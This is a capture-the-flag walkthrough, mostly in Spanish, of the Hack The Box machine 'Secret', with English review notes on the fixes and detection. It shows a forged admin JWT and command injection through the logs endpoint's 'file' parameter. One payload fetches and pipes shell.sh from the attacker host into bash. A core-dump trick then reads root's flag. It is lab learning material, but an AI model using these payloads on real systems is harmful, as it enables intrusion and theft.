# Reconnaissance: three nmap passes and a nikto web scan against the target.
# Every nmap run writes all three output formats (-oA) under a file prefix.
#
# Full TCP range (-p-) with -A (OS + version detection, default NSE, traceroute),
# the NSE "vuln" category added, a per-script timeout, and a floor of 10000
# packets/s (--min-rate).  NOTE(review): a rate floor that high is noisy and can
# lose responses on a lossy link; acceptable on a lab box, not on an engagement
# where a missed port matters.
nmap -A -p- -oA secret 10.129.251.66 --min-rate=10000 --script=vuln --script-timeout=15 -v

# Quieter baseline: default scripts (-sC), version (-sV) and OS (-O) detection.
# NOTE(review): this reuses the -oA prefix "secret" from the first scan, so
# secret.nmap / secret.xml / secret.gnmap from that run are overwritten here;
# use a distinct prefix if both result sets are to be kept.
nmap -sC -sV -O -p- -oA secret 10.129.251.66

# UDP sweep of all ports; a separate prefix so the TCP results are not clobbered.
nmap -sU -O -p- -oA secret-udp 10.129.251.66

# Web server misconfiguration / known-issue checks on port 80.
nikto -h 10.129.251.66:80

Pasted image 20211107113432.png

Pasted image 20211107114011.png

whatweb http://10.129.251.66

Pasted image 20211107114259.png

Vamos a http://10.129.251.66/api

Pasted image 20211107114701.png

Bajo el código

Pasted image 20211107115046.png

Bajamos GitTools

https://github.com/internetwache/GitTools

bash GitTools/Extractor/extractor.sh /local-web secret

Pasted image 20211107121730.png

ls -ahl

Pasted image 20211107121957.png

cat 0-67...

Pasted image 20211107122222.png

cat 1-55..

Pasted image 20211107122252.png

curl -X POST -H 'Content-Type: application/json' -v http://secret.htb/api/user/register --data

Pasted image 20211107122459.png

curl -X POST -H 'Content-Type: application/json' -v http://secret.htb/api/user/register --data '{"name": "cu3rv0x","email": "test@gmail.com","password": "password123"}'

Pasted image 20211107122907.png

curl -X POST -H 'Content-Type: application/json' -v http://secret.htb/api/user/login --data '{"email": "test@gmail.com","password": "password123"}'

Pasted image 20211107123319.png

curl http://secret.htb/api/priv -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTdlMjgxZWU2N2QzZTA4NTMzOGEzZjYiLCJuYW1lIjoib29wc2llIiwiZW1haWwiOiJvb3BzaWVAb29wcy5jb20iLCJpYXQiOjE2MzU2NTc4NTd9.7v-DST155DL_5yuhC9Zbe2rdyPiGCcd8aeYUucQLVzU'

Pasted image 20211107123634.png

python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTdlMjgxZWU2N2QzZTA4NTMzOGEzZjYiLCJuYW1lIjoib29wc2llIiwiZW1haWwiOiJvb3Bz aWVAb29wcy5jb20iLCJpYXQiOjE2MzU2NTc4NTd9.7v-DST155DL_5yuhC9Zbe2rdyPiGCcd8aeYUucQLVzU

# The logs endpoint's "file" query parameter evidently reaches a shell: the
# first request appends ";id" and the second uses the same point to fetch and
# run shell.sh from the author's own host (10.129.14.66:8000).
# The auth-token differs from the earlier ones: its payload's "name" claim now
# reads "theadmin" and the signature is new, i.e. the HS256 secret was
# available to the author (presumably recovered from the extracted git history
# — confirm).
# NOTE(review): two independent server-side defects are on display.
# (1) Request data interpolated into a shell command — the fix is to never
#     build the command from the request at all: resolve the log name against
#     an allowlist and open the file directly.
# (2) A signing secret that left with the source history — it must be rotated,
#     and secrets kept out of the repository (env/secret store), since every
#     token ever issued under it is now forgeable.
# Detection: a "file=" value containing ";" or "|" in the access log, and an
# outbound fetch from the web server's user, are the signals to alert on.
curl 'http://secret.htb/api/logs?file=;id' -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTdlMjgxZWU2N2QzZTA4NTMzOGEzZjYiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6Im9vcHNpZUBvb3BzLmNvbSIsImlhdCI6MTYzNTY1Nzg1N30.atZrtL6UzhLQNDANrsNWeiv9wt4dzdYeOLaiGeNahcw'

curl 'http://secret.htb/api/logs?file=;curl+http://10.129.14.66:8000/shell.sh+|+bash' -H 'auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTdlMjgxZWU2N2QzZTA4NTMzOGEzZjYiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6Im9vcHNpZUBvb3BzLmNvbSIsImlhdCI6MTYzNTY1Nzg1N30.atZrtL6UzhLQNDANrsNWeiv9wt4dzdYeOLaiGeNahcw'

Pasted image 20211107123740.png

Nos dirigimos a /opt

# Run the count binary found in /opt.  The second line is not a shell command:
# it is the path typed at count's own prompt.  That count can read
# /root/root.txt for an unprivileged user implies it runs with elevated
# privilege (setuid or a file capability — not visible here, confirm with
# ls -l / getcap); the process is then left waiting at its prompt so that the
# file contents are still in its memory.
./count -p

/root/root.txt

y Pasted image 20211210165519.png

En otra shell hacemos lo siguiente:

# From a second shell: find the waiting count process and send it a signal.
# (Style: `pgrep count` avoids the grep matching its own command line.)
ps -aux | grep count

# NOTE(review): as written this passes two signal options; bash's builtin kill
# appears to honour the last one, which matches the "Bus error (core dumped)"
# reported in the first shell, i.e. SIGBUS reached the process.  The defender's
# takeaway is in the next steps: a privileged process holding sensitive file
# contents was core-dumpable, and the dump was collected by apport as a report
# readable by the same user.  Such a binary should mark itself non-dumpable
# (prctl PR_SET_DUMPABLE) and drop privileges after the read, and the host
# policy for privileged-process dumps (fs.suid_dumpable) should be reviewed.
kill -9 -BUS 1503

Ahora vemos que en el primer shell dice: Path: Bus error (core dumped)

Pasted image 20211210165729.png

# Apport writes crash reports to /var/crash; the name _opt_count.1000.crash
# encodes the executable path (/opt/count) and the uid that ran it (1000).
cd /var/crash

ls -al

# Working directory for the unpacked report.
# NOTE(review): a fixed, predictable /tmp name; `mktemp -d` is the safer habit.
mkdir /tmp/cu3rv0x

# Split the report into its fields (among them the CoreDump file).
apport-unpack _opt_count.1000.crash /tmp/cu3rv0x

cd /tmp/cu3rv0x

Pasted image 20211210165941.png

strings CoreDump

Pasted image 20211210170317.png

Logramos ver el hash de root.txt

Pasted image 20211210170340.png
